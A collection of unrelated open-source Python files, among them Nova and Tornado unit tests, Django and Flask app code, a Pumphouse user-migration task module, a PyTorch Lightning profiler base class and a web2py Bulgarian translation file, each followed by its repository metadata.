vm_states.BUILDING, vm_states.BUILDING, task_states.SPAWNING,
None, host="someotherhost")
self.assertEqual(1, len(fake_notifier.NOTIFICATIONS))
# service name should default to 'compute'
notif = fake_notifier.NOTIFICATIONS[0]
self.assertEqual('compute.someotherhost', notif.publisher_id)
def test_payload_has_fixed_ip_labels(self):
info = notifications.info_from_instance(self.context, self.instance,
self.net_info, None)
self.assertIn("fixed_ips", info)
self.assertEqual(info["fixed_ips"][0]["label"], "test1")
def test_send_access_ip_update(self):
notifications.send_update(self.context, self.instance, self.instance)
self.assertEqual(1, len(fake_notifier.NOTIFICATIONS))
notif = fake_notifier.NOTIFICATIONS[0]
payload = notif.payload
access_ip_v4 = self.instance["access_ip_v4"]
access_ip_v6 = self.instance["access_ip_v6"]
self.assertEqual(payload["access_ip_v4"], access_ip_v4)
self.assertEqual(payload["access_ip_v6"], access_ip_v6)
def test_send_name_update(self):
param = {"display_name": "new_display_name"}
new_name_inst = self._wrapped_create(params=param)
notifications.send_update(self.context, self.instance, new_name_inst)
self.assertEqual(1, len(fake_notifier.NOTIFICATIONS))
notif = fake_notifier.NOTIFICATIONS[0]
payload = notif.payload
old_display_name = self.instance["display_name"]
new_display_name = new_name_inst["display_name"]
self.assertEqual(payload["old_display_name"], old_display_name)
self.assertEqual(payload["display_name"], new_display_name)
def test_send_no_state_change(self):
called = [False]
def sending_no_state_change(context, instance, **kwargs):
called[0] = True
self.stubs.Set(notifications, '_send_instance_update_notification',
sending_no_state_change)
notifications.send_update(self.context, self.instance, self.instance)
self.assertTrue(called[0])
def test_fail_sending_update(self):
def fail_sending(context, instance, **kwargs):
raise Exception('failed to notify')
self.stubs.Set(notifications, '_send_instance_update_notification',
fail_sending)
notifications.send_update(self.context, self.instance, self.instance)
self.assertEqual(0, len(fake_notifier.NOTIFICATIONS))
| CiscoSystems/nova | nova/tests/test_notifications.py | Python | apache-2.0 | 13,358 |
# Generated by Django 2.1.7 on 2019-04-23 06:03
import diventi.accounts.models
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('accounts', '0050_auto_20190421_2252'),
]
operations = [
migrations.AlterModelManagers(
name='diventiuser',
managers=[
('objects', diventi.accounts.models.DiventiUserManager()),
],
),
]
| flavoi/diventi | diventi/accounts/migrations/0051_auto_20190423_0803.py | Python | apache-2.0 | 452 |
# Copyright 2010 http://www.collabq.com
import logging
from django.conf import settings
from django.http import HttpResponseRedirect
from common import api
from common import exception
class VerifyInstallMiddleware(object):
def process_request(self, request):
logging.info("VerifyInstallMiddleware")
logging.info("Path %s" % request.path)
if not request.path == '/install':
try:
root_user = api.actor_get(api.ROOT, settings.ROOT_NICK)
logging.info("Root Exists")
except:
logging.info("Root Does Not Exists")
return HttpResponseRedirect('/install') | CollabQ/CollabQ | middleware/verify.py | Python | apache-2.0 | 608 |
"""schmankerl URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
from schmankerlapp import views
from django.contrib.auth import views as auth_views
from django.conf.urls.static import static
from django.conf import settings
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^$', views.home, name='home'),
#restaurant
url(r'^restaurant/sign-in/$', auth_views.login,
{'template_name': 'restaurant/sign-in.html'},
name = 'restaurant-sign-in'),
url(r'^restaurant/sign-out', auth_views.logout,
{'next_page': '/'}, name='restaurant-sign-out'),
url(r'^restaurant/sign-up', views.restaurant_sign_up,
name='restaurant-sign-up'),
url(r'^restaurant/$', views.restaurant_home, name='restaurant-home'),
url(r'^restaurant/account/$', views.restaurant_account, name='restaurant-account'),
url(r'^restaurant/meal/$', views.restaurant_meal, name='restaurant-meal'),
url(r'^restaurant/meal/add$', views.restaurant_add_meal, name='restaurant-add-meal'),
url(r'^restaurant/order/$', views.restaurant_order, name='restaurant-order'),
url(r'^restaurant/report/$', views.restaurant_report, name='restaurant-report'),
#sign-up, sign-in, sign-out
url(r'^api/social/', include('rest_framework_social_oauth2.urls')),
# /convert-token (sign-in, sign-out)
# /revoke-token (sign-out)
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| MarxDimitri/schmankerl | schmankerl/urls.py | Python | apache-2.0 | 2,082 |
#!/usr/bin/env python
#
# Copyright 2014 Facebook
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import, division, print_function
from contextlib import closing
import os
import socket
from tornado.concurrent import Future
from tornado.netutil import bind_sockets, Resolver
from tornado.queues import Queue
from tornado.tcpclient import TCPClient, _Connector
from tornado.tcpserver import TCPServer
from tornado.testing import AsyncTestCase, gen_test
from tornado.test.util import skipIfNoIPv6, unittest, refusing_port, skipIfNonUnix, skipOnTravis
from tornado.gen import TimeoutError
# Fake address families for testing. Used in place of AF_INET
# and AF_INET6 because some installations do not have AF_INET6.
AF1, AF2 = 1, 2
class TestTCPServer(TCPServer):
def __init__(self, family):
super(TestTCPServer, self).__init__()
self.streams = []
self.queue = Queue()
sockets = bind_sockets(None, 'localhost', family)
self.add_sockets(sockets)
self.port = sockets[0].getsockname()[1]
def handle_stream(self, stream, address):
self.streams.append(stream)
self.queue.put(stream)
def stop(self):
super(TestTCPServer, self).stop()
for stream in self.streams:
stream.close()
class TCPClientTest(AsyncTestCase):
def setUp(self):
super(TCPClientTest, self).setUp()
self.server = None
self.client = TCPClient()
def start_server(self, family):
if family == socket.AF_UNSPEC and 'TRAVIS' in os.environ:
self.skipTest("dual-stack servers often have port conflicts on travis")
self.server = TestTCPServer(family)
return self.server.port
def stop_server(self):
if self.server is not None:
self.server.stop()
self.server = None
def tearDown(self):
self.client.close()
self.stop_server()
super(TCPClientTest, self).tearDown()
def skipIfLocalhostV4(self):
# The port used here doesn't matter, but some systems require it
# to be non-zero if we do not also pass AI_PASSIVE.
Resolver().resolve('localhost', 80, callback=self.stop)
addrinfo = self.wait()
families = set(addr[0] for addr in addrinfo)
if socket.AF_INET6 not in families:
self.skipTest("localhost does not resolve to ipv6")
@gen_test
def do_test_connect(self, family, host, source_ip=None, source_port=None):
port = self.start_server(family)
stream = yield self.client.connect(host, port,
source_ip=source_ip,
source_port=source_port)
server_stream = yield self.server.queue.get()
with closing(stream):
stream.write(b"hello")
data = yield server_stream.read_bytes(5)
self.assertEqual(data, b"hello")
def test_connect_ipv4_ipv4(self):
self.do_test_connect(socket.AF_INET, '127.0.0.1')
def test_connect_ipv4_dual(self):
self.do_test_connect(socket.AF_INET, 'localhost')
@skipIfNoIPv6
def test_connect_ipv6_ipv6(self):
self.skipIfLocalhostV4()
self.do_test_connect(socket.AF_INET6, '::1')
@skipIfNoIPv6
def test_connect_ipv6_dual(self):
self.skipIfLocalhostV4()
if Resolver.configured_class().__name__.endswith('TwistedResolver'):
self.skipTest('TwistedResolver does not support multiple addresses')
self.do_test_connect(socket.AF_INET6, 'localhost')
def test_connect_unspec_ipv4(self):
self.do_test_connect(socket.AF_UNSPEC, '127.0.0.1')
@skipIfNoIPv6
def test_connect_unspec_ipv6(self):
self.skipIfLocalhostV4()
self.do_test_connect(socket.AF_UNSPEC, '::1')
def test_connect_unspec_dual(self):
self.do_test_connect(socket.AF_UNSPEC, 'localhost')
@gen_test
def test_refused_ipv4(self):
cleanup_func, port = refusing_port()
self.addCleanup(cleanup_func)
with self.assertRaises(IOError):
yield self.client.connect('127.0.0.1', port)
def test_source_ip_fail(self):
'''
Fail when trying to use the source IP Address '8.8.8.8'.
'''
self.assertRaises(socket.error,
self.do_test_connect,
socket.AF_INET,
'127.0.0.1',
source_ip='8.8.8.8')
def test_source_ip_success(self):
'''
Success when trying to use the source IP Address '127.0.0.1'
'''
self.do_test_connect(socket.AF_INET, '127.0.0.1', source_ip='127.0.0.1')
@skipIfNonUnix
def test_source_port_fail(self):
'''
Fail when trying to use source port 1.
'''
self.assertRaises(socket.error,
self.do_test_connect,
socket.AF_INET,
'127.0.0.1',
source_port=1)
@gen_test
def test_connect_timeout(self):
timeout = 0.05
class TimeoutResolver(Resolver):
def resolve(self, *args, **kwargs):
return Future() # never completes
with self.assertRaises(TimeoutError):
yield TCPClient(resolver=TimeoutResolver()).connect(
'1.2.3.4', 12345, timeout=timeout)
class TestConnectorSplit(unittest.TestCase):
def test_one_family(self):
# These addresses aren't in the right format, but split doesn't care.
primary, secondary = _Connector.split(
[(AF1, 'a'),
(AF1, 'b')])
self.assertEqual(primary, [(AF1, 'a'),
(AF1, 'b')])
self.assertEqual(secondary, [])
def test_mixed(self):
primary, secondary = _Connector.split(
[(AF1, 'a'),
(AF2, 'b'),
(AF1, 'c'),
(AF2, 'd')])
self.assertEqual(primary, [(AF1, 'a'), (AF1, 'c')])
self.assertEqual(secondary, [(AF2, 'b'), (AF2, 'd')])
class ConnectorTest(AsyncTestCase):
class FakeStream(object):
def __init__(self):
self.closed = False
def close(self):
self.closed = True
def setUp(self):
super(ConnectorTest, self).setUp()
self.connect_futures = {}
self.streams = {}
self.addrinfo = [(AF1, 'a'), (AF1, 'b'),
(AF2, 'c'), (AF2, 'd')]
def tearDown(self):
# Unless explicitly checked (and popped) in the test, we shouldn't
# be closing any streams
for stream in self.streams.values():
self.assertFalse(stream.closed)
super(ConnectorTest, self).tearDown()
def create_stream(self, af, addr):
stream = ConnectorTest.FakeStream()
self.streams[addr] = stream
future = Future()
self.connect_futures[(af, addr)] = future
return stream, future
def assert_pending(self, *keys):
self.assertEqual(sorted(self.connect_futures.keys()), sorted(keys))
def resolve_connect(self, af, addr, success):
future = self.connect_futures.pop((af, addr))
if success:
future.set_result(self.streams[addr])
else:
self.streams.pop(addr)
future.set_exception(IOError())
# Run the loop to allow callbacks to be run.
self.io_loop.add_callback(self.stop)
self.wait()
def assert_connector_streams_closed(self, conn):
for stream in conn.streams:
self.assertTrue(stream.closed)
def start_connect(self, addrinfo):
conn = _Connector(addrinfo, self.create_stream)
# Give it a huge timeout; we'll trigger timeouts manually.
future = conn.start(3600, connect_timeout=self.io_loop.time() + 3600)
return conn, future
def test_immediate_success(self):
conn, future = self.start_connect(self.addrinfo)
self.assertEqual(list(self.connect_futures.keys()),
[(AF1, 'a')])
self.resolve_connect(AF1, 'a', True)
self.assertEqual(future.result(), (AF1, 'a', self.streams['a']))
def test_immediate_failure(self):
# Fail with just one address.
conn, future = self.start_connect([(AF1, 'a')])
self.assert_pending((AF1, 'a'))
self.resolve_connect(AF1, 'a', False)
self.assertRaises(IOError, future.result)
def test_one_family_second_try(self):
conn, future = self.start_connect([(AF1, 'a'), (AF1, 'b')])
self.assert_pending((AF1, 'a'))
self.resolve_connect(AF1, 'a', False)
self.assert_pending((AF1, 'b'))
self.resolve_connect(AF1, 'b', True)
self.assertEqual(future.result(), (AF1, 'b', self.streams['b']))
def test_one_family_second_try_failure(self):
conn, future = self.start_connect([(AF1, 'a'), (AF1, 'b')])
self.assert_pending((AF1, 'a'))
self.resolve_connect(AF1, 'a', False)
self.assert_pending((AF1, 'b'))
self.resolve_connect(AF1, 'b', False)
self.assertRaises(IOError, future.result)
def test_one_family_second_try_timeout(self):
conn, future = self.start_connect([(AF1, 'a'), (AF1, 'b')])
self.assert_pending((AF1, 'a'))
# trigger the timeout while the first lookup is pending;
# nothing happens.
conn.on_timeout()
self.assert_pending((AF1, 'a'))
self.resolve_connect(AF1, 'a', False)
self.assert_pending((AF1, 'b'))
self.resolve_connect(AF1, 'b', True)
self.assertEqual(future.result(), (AF1, 'b', self.streams['b']))
def test_two_families_immediate_failure(self):
conn, future = self.start_connect(self.addrinfo)
self.assert_pending((AF1, 'a'))
self.resolve_connect(AF1, 'a', False)
self.assert_pending((AF1, 'b'), (AF2, 'c'))
self.resolve_connect(AF1, 'b', False)
self.resolve_connect(AF2, 'c', True)
self.assertEqual(future.result(), (AF2, 'c', self.streams['c']))
def test_two_families_timeout(self):
conn, future = self.start_connect(self.addrinfo)
self.assert_pending((AF1, 'a'))
conn.on_timeout()
self.assert_pending((AF1, 'a'), (AF2, 'c'))
self.resolve_connect(AF2, 'c', True)
self.assertEqual(future.result(), (AF2, 'c', self.streams['c']))
# resolving 'a' after the connection has completed doesn't start 'b'
self.resolve_connect(AF1, 'a', False)
self.assert_pending()
def test_success_after_timeout(self):
conn, future = self.start_connect(self.addrinfo)
self.assert_pending((AF1, 'a'))
conn.on_timeout()
self.assert_pending((AF1, 'a'), (AF2, 'c'))
self.resolve_connect(AF1, 'a', True)
self.assertEqual(future.result(), (AF1, 'a', self.streams['a']))
# resolving 'c' after completion closes the connection.
self.resolve_connect(AF2, 'c', True)
self.assertTrue(self.streams.pop('c').closed)
def test_all_fail(self):
conn, future = self.start_connect(self.addrinfo)
self.assert_pending((AF1, 'a'))
conn.on_timeout()
self.assert_pending((AF1, 'a'), (AF2, 'c'))
self.resolve_connect(AF2, 'c', False)
self.assert_pending((AF1, 'a'), (AF2, 'd'))
self.resolve_connect(AF2, 'd', False)
# one queue is now empty
self.assert_pending((AF1, 'a'))
self.resolve_connect(AF1, 'a', False)
self.assert_pending((AF1, 'b'))
self.assertFalse(future.done())
self.resolve_connect(AF1, 'b', False)
self.assertRaises(IOError, future.result)
def test_one_family_timeout_after_connect_timeout(self):
conn, future = self.start_connect([(AF1, 'a'), (AF1, 'b')])
self.assert_pending((AF1, 'a'))
conn.on_connect_timeout()
# the connector will close all streams on connect timeout, we
# should explicitly pop the connect_future.
self.connect_futures.pop((AF1, 'a'))
self.assertTrue(self.streams.pop('a').closed)
conn.on_timeout()
# if the future is set with TimeoutError, we will not iterate next
# possible address.
self.assert_pending()
self.assertEqual(len(conn.streams), 1)
self.assert_connector_streams_closed(conn)
self.assertRaises(TimeoutError, future.result)
def test_one_family_success_before_connect_timeout(self):
conn, future = self.start_connect([(AF1, 'a'), (AF1, 'b')])
self.assert_pending((AF1, 'a'))
self.resolve_connect(AF1, 'a', True)
conn.on_connect_timeout()
self.assert_pending()
self.assertEqual(self.streams['a'].closed, False)
# success stream will be pop
self.assertEqual(len(conn.streams), 0)
# streams in connector should be closed after connect timeout
self.assert_connector_streams_closed(conn)
self.assertEqual(future.result(), (AF1, 'a', self.streams['a']))
def test_one_family_second_try_after_connect_timeout(self):
conn, future = self.start_connect([(AF1, 'a'), (AF1, 'b')])
self.assert_pending((AF1, 'a'))
self.resolve_connect(AF1, 'a', False)
self.assert_pending((AF1, 'b'))
conn.on_connect_timeout()
self.connect_futures.pop((AF1, 'b'))
self.assertTrue(self.streams.pop('b').closed)
self.assert_pending()
self.assertEqual(len(conn.streams), 2)
self.assert_connector_streams_closed(conn)
self.assertRaises(TimeoutError, future.result)
def test_one_family_second_try_failure_before_connect_timeout(self):
conn, future = self.start_connect([(AF1, 'a'), (AF1, 'b')])
self.assert_pending((AF1, 'a'))
self.resolve_connect(AF1, 'a', False)
self.assert_pending((AF1, 'b'))
self.resolve_connect(AF1, 'b', False)
conn.on_connect_timeout()
self.assert_pending()
self.assertEqual(len(conn.streams), 2)
self.assert_connector_streams_closed(conn)
self.assertRaises(IOError, future.result)
def test_two_family_timeout_before_connect_timeout(self):
conn, future = self.start_connect(self.addrinfo)
self.assert_pending((AF1, 'a'))
conn.on_timeout()
self.assert_pending((AF1, 'a'), (AF2, 'c'))
conn.on_connect_timeout()
self.connect_futures.pop((AF1, 'a'))
self.assertTrue(self.streams.pop('a').closed)
self.connect_futures.pop((AF2, 'c'))
self.assertTrue(self.streams.pop('c').closed)
self.assert_pending()
self.assertEqual(len(conn.streams), 2)
self.assert_connector_streams_closed(conn)
self.assertRaises(TimeoutError, future.result)
def test_two_family_success_after_timeout(self):
conn, future = self.start_connect(self.addrinfo)
self.assert_pending((AF1, 'a'))
conn.on_timeout()
self.assert_pending((AF1, 'a'), (AF2, 'c'))
self.resolve_connect(AF1, 'a', True)
# if one of streams succeed, connector will close all other streams
self.connect_futures.pop((AF2, 'c'))
self.assertTrue(self.streams.pop('c').closed)
self.assert_pending()
self.assertEqual(len(conn.streams), 1)
self.assert_connector_streams_closed(conn)
self.assertEqual(future.result(), (AF1, 'a', self.streams['a']))
def test_two_family_timeout_after_connect_timeout(self):
conn, future = self.start_connect(self.addrinfo)
self.assert_pending((AF1, 'a'))
conn.on_connect_timeout()
self.connect_futures.pop((AF1, 'a'))
self.assertTrue(self.streams.pop('a').closed)
self.assert_pending()
conn.on_timeout()
# if the future is set with TimeoutError, connector will not
# trigger secondary address.
self.assert_pending()
self.assertEqual(len(conn.streams), 1)
self.assert_connector_streams_closed(conn)
self.assertRaises(TimeoutError, future.result)
| legnaleurc/tornado | tornado/test/tcpclient_test.py | Python | apache-2.0 | 16,665 |
# Copyright (c) 2014 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the License);
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an AS IS BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and#
# limitations under the License.
import logging
from taskflow.patterns import linear_flow
from pumphouse import exceptions
from pumphouse import events
from pumphouse import task
LOG = logging.getLogger(__name__)
class RetrieveUser(task.BaseCloudTask):
def execute(self, user_id):
user = self.cloud.keystone.users.get(user_id)
self.cloud.identity.fetch(user.id)
return user.to_dict()
class EnsureUser(task.BaseCloudTask):
def execute(self, user_info, tenant_info):
try:
user = self.cloud.keystone.users.find(name=user_info["name"])
# TODO(akscram): Current password should be replaced by temporary.
except exceptions.keystone_excs.NotFound:
user = self.cloud.keystone.users.create(
name=user_info["name"],
# TODO(akscram): Here we should generate a temporary
# password for the user and use them
# along the migration process.
# The RepairUserPasswords should repair
# original after all operations.
password="default",
email=user_info["email"],
tenant_id=tenant_info["id"] if tenant_info else None,
enabled=user_info["enabled"],
)
self.created_event(user)
return user.to_dict()
def created_event(self, user):
LOG.info("Created user: %s", user)
events.emit("create", {
"id": user.id,
"type": "user",
"cloud": self.cloud.name,
"data": user.to_dict(),
}, namespace="/events")
class EnsureOrphanUser(EnsureUser):
def execute(self, user_info):
super(EnsureOrphanUser, self).execute(user_info, None)
class EnsureUserRole(task.BaseCloudTask):
def execute(self, user_info, role_info, tenant_info):
try:
self.cloud.keystone.tenants.add_user(tenant_info["id"],
user_info["id"],
role_info["id"])
except exceptions.keystone_excs.Conflict:
pass
else:
self.role_assigned_event(role_info, user_info, tenant_info)
return user_info
def role_assigned_event(self, role_info, user_info, tenant_info):
LOG.info("Created role %s assignment for user %s in tenant %s",
role_info["id"], user_info["id"], tenant_info["id"])
def migrate_membership(context, user_id, role_id, tenant_id):
user_ensure = "user-{}-ensure".format(user_id)
role_ensure = "role-{}-ensure".format(role_id)
tenant_ensure = "tenant-{}-ensure".format(tenant_id)
user_role_ensure = "user-role-{}-{}-{}-ensure".format(user_id, role_id,
tenant_id)
task = EnsureUserRole(context.dst_cloud,
name=user_role_ensure,
provides=user_role_ensure,
rebind=[user_ensure, role_ensure,
tenant_ensure])
context.store[user_role_ensure] = user_role_ensure
return task
def migrate_user(context, user_id, tenant_id=None):
user_binding = "user-{}".format(user_id)
user_retrieve = "{}-retrieve".format(user_binding)
user_ensure = "{}-ensure".format(user_binding)
flow = linear_flow.Flow("migrate-user-{}".format(user_id))
flow.add(RetrieveUser(context.src_cloud,
name=user_binding,
provides=user_binding,
rebind=[user_retrieve]))
if tenant_id is not None:
tenant_ensure = "tenant-{}-ensure".format(tenant_id)
flow.add(EnsureUser(context.dst_cloud,
name=user_ensure,
provides=user_ensure,
rebind=[user_binding, tenant_ensure]))
else:
flow.add(EnsureUser(context.dst_cloud,
name=user_ensure,
provides=user_ensure,
rebind=[user_binding],
inject={"tenant_info": None}))
context.store[user_retrieve] = user_id
return flow
| Mirantis/pumphouse | pumphouse/tasks/user.py | Python | apache-2.0 | 4,857 |
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Profiler to check if there are any bottlenecks in your code."""
import logging
import os
from abc import ABC, abstractmethod
from contextlib import contextmanager
from pathlib import Path
from typing import Any, Callable, Dict, Generator, Iterable, Optional, TextIO, Union
from pytorch_lightning.utilities.cloud_io import get_filesystem
log = logging.getLogger(__name__)
class AbstractProfiler(ABC):
"""Specification of a profiler."""
@abstractmethod
def start(self, action_name: str) -> None:
"""Defines how to start recording an action."""
@abstractmethod
def stop(self, action_name: str) -> None:
"""Defines how to record the duration once an action is complete."""
@abstractmethod
def summary(self) -> str:
"""Create profiler summary in text format."""
@abstractmethod
def setup(self, **kwargs: Any) -> None:
"""Execute arbitrary pre-profiling set-up steps as defined by subclass."""
@abstractmethod
def teardown(self, **kwargs: Any) -> None:
"""Execute arbitrary post-profiling tear-down steps as defined by subclass."""
class BaseProfiler(AbstractProfiler):
"""
If you wish to write a custom profiler, you should inherit from this class.
"""
def __init__(
self,
dirpath: Optional[Union[str, Path]] = None,
filename: Optional[str] = None,
) -> None:
self.dirpath = dirpath
self.filename = filename
self._output_file: Optional[TextIO] = None
self._write_stream: Optional[Callable] = None
self._local_rank: Optional[int] = None
self._log_dir: Optional[str] = None
self._stage: Optional[str] = None
@contextmanager
def profile(self, action_name: str) -> Generator:
"""
Yields a context manager to encapsulate the scope of a profiled action.
Example::
with self.profile('load training data'):
# load training data code
The profiler will start once you've entered the context and will automatically
stop once you exit the code block.
"""
try:
self.start(action_name)
yield action_name
finally:
self.stop(action_name)
def profile_iterable(self, iterable: Iterable, action_name: str) -> Generator:
iterator = iter(iterable)
while True:
try:
self.start(action_name)
value = next(iterator)
self.stop(action_name)
yield value
except StopIteration:
self.stop(action_name)
break
def _rank_zero_info(self, *args, **kwargs) -> None:
if self._local_rank in (None, 0):
log.info(*args, **kwargs)
def _prepare_filename(
self, action_name: Optional[str] = None, extension: str = ".txt", split_token: str = "-"
) -> str:
args = []
if self._stage is not None:
args.append(self._stage)
if self.filename:
args.append(self.filename)
if self._local_rank is not None:
args.append(str(self._local_rank))
if action_name is not None:
args.append(action_name)
filename = split_token.join(args) + extension
return filename
def _prepare_streams(self) -> None:
if self._write_stream is not None:
return
if self.filename:
filepath = os.path.join(self.dirpath, self._prepare_filename())
fs = get_filesystem(filepath)
file = fs.open(filepath, "a")
self._output_file = file
self._write_stream = file.write
else:
self._write_stream = self._rank_zero_info
def describe(self) -> None:
"""Logs a profile report after the conclusion of run."""
# there are pickling issues with open file handles in Python 3.6
# so to avoid them, we open and close the files within this function
# by calling `_prepare_streams` and `teardown`
self._prepare_streams()
summary = self.summary()
if summary:
self._write_stream(summary)
if self._output_file is not None:
self._output_file.flush()
self.teardown(stage=self._stage)
def _stats_to_str(self, stats: Dict[str, str]) -> str:
stage = f"{self._stage.upper()} " if self._stage is not None else ""
output = [stage + "Profiler Report"]
for action, value in stats.items():
header = f"Profile stats for: {action}"
if self._local_rank is not None:
header += f" rank: {self._local_rank}"
output.append(header)
output.append(value)
return os.linesep.join(output)
def setup(
self, stage: Optional[str] = None, local_rank: Optional[int] = None, log_dir: Optional[str] = None
) -> None:
"""Execute arbitrary pre-profiling set-up steps."""
self._stage = stage
self._local_rank = local_rank
self._log_dir = log_dir
self.dirpath = self.dirpath or log_dir
def teardown(self, stage: Optional[str] = None) -> None:
"""
Execute arbitrary post-profiling tear-down steps.
Closes the currently open file and stream.
"""
self._write_stream = None
if self._output_file is not None:
self._output_file.close()
self._output_file = None # can't pickle TextIOWrapper
def __del__(self) -> None:
self.teardown(stage=self._stage)
def start(self, action_name: str) -> None:
raise NotImplementedError
def stop(self, action_name: str) -> None:
raise NotImplementedError
def summary(self) -> str:
raise NotImplementedError
@property
def local_rank(self) -> int:
return 0 if self._local_rank is None else self._local_rank
class PassThroughProfiler(BaseProfiler):
"""
This class should be used when you don't want the (small) overhead of profiling.
The Trainer uses this class by default.
"""
def start(self, action_name: str) -> None:
pass
def stop(self, action_name: str) -> None:
pass
def summary(self) -> str:
return ""
| williamFalcon/pytorch-lightning | pytorch_lightning/profiler/base.py | Python | apache-2.0 | 6,875 |
__author__ = 'mwn'
import os
import sys
import logging
from logging.handlers import RotatingFileHandler
from flask import Flask, render_template
app = Flask(__name__)
app.config.from_object('config')
handler = RotatingFileHandler('yapki.log', maxBytes=10000, backupCount=1)
handler.setLevel(logging.DEBUG)
app.logger.addHandler(handler)
########################
# Configure Secret Key #
########################
def install_secret_key(app, filename='secret_key'):
"""Configure the SECRET_KEY from a file
in the instance directory.
If the file does not exist, print instructions
to create it from a shell with a random key,
then exit.
"""
filename = os.path.join(app.instance_path, filename)
try:
app.config['SECRET_KEY'] = open(filename, 'rb').read()
except IOError:
print('Error: No secret key. Create it with:')
full_path = os.path.dirname(filename)
if not os.path.isdir(full_path):
print('mkdir -p {filename}'.format(filename=full_path))
print('head -c 24 /dev/urandom > {filename}'.format(filename=filename))
sys.exit(1)
if not app.config['DEBUG']:
install_secret_key(app)
@app.errorhandler(404)
def not_found(error):
return render_template('404.html'), 404
@app.after_request
def after_request(response):
response.headers.add('X-Test', 'This is only test.')
response.headers.add('Access-Control-Allow-Origin', '*') # TODO: set to real origin
return response
from app.web.controller import webBp
app.register_blueprint(webBp)
from app.rest.controller import restBp
app.register_blueprint(restBp)
| yafraorg/yafra-archive | yafra-python/server/app/__init__.py | Python | apache-2.0 | 1,628 |
#!/usr/bin/python
#coding=utf-8
'''
@author: sheng
@license:
'''
SPELL=u'láogōng'
CN=u'劳宫'
NAME=u'laogong21'
CHANNEL='pericardium'
CHANNEL_FULLNAME='PericardiumChannelofHand-Jueyin'
SEQ='PC8'
if __name__ == '__main__':
pass
| sinotradition/meridian | meridian/acupoints/laogong21.py | Python | apache-2.0 | 241 |
# -*- coding: utf-8 -*-
{
'!langcode!': 'bg',
'!langname!': 'Български',
'"update" is an optional expression like "field1=\'newvalue\'". You cannot update or delete the results of a JOIN': '"update" is an optional expression like "field1=\'newvalue\'". You cannot update or delete the results of a JOIN',
'"User Exception" debug mode. ': '"User Exception" debug mode. ',
'%s': '%s',
'%s %%{row} deleted': '%s записите бяха изтрити',
'%s %%{row} updated': '%s записите бяха обновени',
'%s selected': '%s selected',
'%s students registered': '%s students registered',
'%Y-%m-%d': '%Y-%m-%d',
'%Y-%m-%d %H:%M:%S': '%Y-%m-%d %H:%M:%S',
'(requires internet access)': '(requires internet access)',
'(requires internet access, experimental)': '(requires internet access, experimental)',
'(something like "it-it")': '(something like "it-it")',
'(version %s)': '(version %s)',
'?': '?',
'@markmin\x01Searching: **%s** %%{file}': 'Searching: **%s** files',
'A new version of web2py is available': 'A new version of web2py is available',
'A new version of web2py is available: %s': 'A new version of web2py is available: %s',
'Abort': 'Abort',
'About': 'about',
'About application': 'About application',
'Accept Terms': 'Accept Terms',
'Add breakpoint': 'Add breakpoint',
'additional code for your application': 'additional code for your application',
'Additional code for your application': 'Additional code for your application',
'Admin design page': 'Admin design page',
'admin disabled because no admin password': 'admin disabled because no admin password',
'admin disabled because not supported on google app engine': 'admin disabled because not supported on google apps engine',
'admin disabled because too many invalid login attempts': 'admin disabled because too many invalid login attempts',
'admin disabled because unable to access password file': 'admin disabled because unable to access password file',
'Admin is disabled because insecure channel': 'Admin is disabled because insecure channel',
'Admin is disabled because unsecure channel': 'Admin is disabled because unsecure channel',
'Admin language': 'Admin language',
'Admin versioning page': 'Admin versioning page',
'administrative interface': 'administrative interface',
'Administrator Password:': 'Administrator Password:',
'and rename it (required):': 'and rename it (required):',
'and rename it:': 'and rename it:',
'App does not exist or you are not authorized': 'App does not exist or you are not authorized',
'appadmin': 'appadmin',
'appadmin is disabled because insecure channel': 'appadmin is disabled because insecure channel',
'Application': 'Application',
'application "%s" uninstalled': 'application "%s" uninstalled',
'Application cannot be generated in demo mode': 'Application cannot be generated in demo mode',
'application compiled': 'application compiled',
'Application exists already': 'Application exists already',
'application is compiled and cannot be designed': 'application is compiled and cannot be designed',
'Application name:': 'Application name:',
'Application updated via git pull': 'Application updated via git pull',
'are not used': 'are not used',
'are not used yet': 'are not used yet',
'Are you sure you want to delete file "%s"?': 'Are you sure you want to delete file "%s"?',
'Are you sure you want to delete plugin "%s"?': 'Are you sure you want to delete plugin "%s"?',
'Are you sure you want to delete this object?': 'Are you sure you want to delete this object?',
'Are you sure you want to uninstall application "%s"': 'Are you sure you want to uninstall application "%s"',
'Are you sure you want to uninstall application "%s"?': 'Are you sure you want to uninstall application "%s"?',
'Are you sure you want to upgrade web2py now?': 'Are you sure you want to upgrade web2py now?',
'Are you sure?': 'Are you sure?',
'arguments': 'arguments',
'at char %s': 'at char %s',
'at line %s': 'at line %s',
'ATTENTION:': 'ATTENTION:',
'ATTENTION: Login requires a secure (HTTPS) connection or running on localhost.': 'ATTENTION: Login requires a secure (HTTPS) connection or running on localhost.',
